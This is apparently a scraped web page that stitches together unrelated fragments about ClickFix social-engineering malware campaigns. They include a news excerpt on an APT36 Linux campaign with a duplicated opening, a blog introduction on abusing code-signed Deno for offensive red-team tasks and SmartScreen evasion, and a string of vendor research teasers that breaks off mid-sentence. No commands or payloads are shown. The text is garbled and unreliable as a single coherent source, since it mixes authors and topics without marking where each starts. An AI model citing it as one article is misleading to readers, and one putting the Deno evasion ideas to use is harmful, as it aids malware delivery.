A new campaign employing ClickFix attacks has been spotted targeting both Windows and Linux systems using instructions that make infections on either operating system possible.
A new campaign employing ClickFix attacks has been spotted targeting both Windows and Linux systems using instructions that make infections on either operating system possible.
ClickFix is a social engineering tactic where fake verification systems or application errors are used to trick website visitors into running console commands that install malware.
These attacks have traditionally targeted Windows systems, prompting targets to execute PowerShell scripts from the Windows Run command, resulting in info-stealer malware infections and even ransomware.
However, a 2024 campaign using bogus Google Meet errors also targeted macOS users.
ClickFix targeting Linux users
A more recent campaign spotted by Hunt.io researchers last week is among the first to adapt this social engineering technique for Linux systems.
The attack, which is attributed to the Pakistan-linked threat group APT36 (aka "Transparent Tribe"), utilizes a website that impersonates India's Ministry of Defence with a link to an allegedly official press release.
I've been following the development of Deno for some time. It kind of pushes all my buttons: a Rust-based Node alternative with an active web developer community?? Yes please.
As a developer, I've been looking for excuses to use Deno because, frankly, it's so much fun. It makes JavaScript/TypeScript enjoyable again by shipping sane defaults and making delightful choices about dependency management.
Deno also has some truly incredible features that go beyond the web development ecosystem. I want to focus on these features. I've wanted to explore Deno from an offensive security perspective for some time, but a new development in version 2.3 made this imperative: deno.exe—the standalone binary that constitutes the entire tool—is now code-signed on Windows.
Great news for Deno! But because of what Deno can do, it's also good news for those who would do nefarious things with it.
Code signing is a guarantee that the binary you got is the one you're supposed to have. It's supposed to be a higher level of trust than simply a hash checksum, since this is Microsoft telling you a trusted developer shipped this program.
It also means (for now), that Defender SmartScreen gives deno.exe a pass.
So what can Deno do for the red team and the ne'er-do-wells? I've put together a small sampling of demonstrations of Deno's capabilities.
I'm focusing somewhat on the "ClickFix" attack vector, since it is so prevalent at the time of writing, and apparently so effective. So with each of these, I want you to imagine some version of a user opening Win+R and pasting a short command in.
Since October 2024, Microsoft Defender Experts has observed and helped multiple customers address campaigns leveraging Node.js to deliver malware and other payloads that ultimately lead to information theft and data exfiltration.
Discover how Lazarus leverages fake job sites in the ClickFake Interview campaign targeting crypto firms using the ClickFix tactic.
Discover ClickFix, a rising social engineering threat used to deliver malware and learn how to detect and respond against it with Logpoint.
Over 100 auto dealerships were being abused compliments of a supply chain attack of a shared video service unique to dealerships. When active, the attack presented dealership visitors with a ClickFix webpage which led to a SectopRAT malware.
Starting in December 2024, leading up to some of the busiest travel days, Microsoft Threat Intelligence identified a phishing campaign that impersonates online travel agency Booking.com and targets organizations in the hospitality industry. The campaign uses a social engineering technique called ClickFix to deliver multiple credential-stealing malware in order to conduct financial fraud and theft. […]
Discover how the ClickFix social engineering attack exploits human psychology to bypass security. Learn how hackers use this tactic and how to protect against it.
ForitGuard Lab reveals a modified Havoc deployed by a ClickFix phishing campaign. The threat actor hides each stage behind SharePoint and also uses it as a C2.
Learn about the fake Google reCAPTCHA campaign infecting machines by tricking unsuspecting users into running malicious Powershell commands.
A large-scale malvertising campaign distributed the Lumma Stealer info-stealing malware through fake CAPTCHA verification pages that prompt users to run PowerShell commands to verify they are not a bot.
Guardio Labs tracked and analyzed a large-scale fake captcha campaign distributing a disastrous Lumma info-stealer malware that circumvents general security measures like Safe Browsing. Entirely reliant on a single ad network for propagation, this campaign showcases the core mechanisms of malvertising — delivering over 1 million daily “ad impressions” and causing thousands of daily victims to lose their accounts and money through a network of 3,000+ content sites funneling traffic. Our research dissects this campaign and provides insights into the malvertising industry’s infrastructure, tactics, and key players.
Through a detailed analysis of redirect chains, obfuscated scripts, and Traffic Distribution Systems (TDS) — in collaboration with our friends at Infoblox — we traced the campaign’s origins to Monetag, a part of ProepllerAds’ network previously tracked by Infoblox under the name “Vane Viper.” Further investigation reveals how threat actors leveraged services like BeMob ad-tracking to cloak their malicious intent, showcasing the fragmented accountability in the ad ecosystem. This lack of oversight leaves internet users vulnerable and enables malvertising campaigns to flourish at scale.
ClickFix fake browser updates are being distributed by bogus WordPress plugins. Learn about the common indicators of compromise.
Detect the ClickFix tactic: a social engineering technique using fake video calls and CAPTCHA pages to deploy malicious code.
Analyse the ClickFix tactic and related campaigns. Uncover a ClickFix campaign impersonating Google Meet and cybercrime infrastructure.
Authored by Yashvi Shah and Vignesh Dhatchanamoorthy McAfee Labs has discovered a highly unusual method of malware delivery, referred to by researchers as
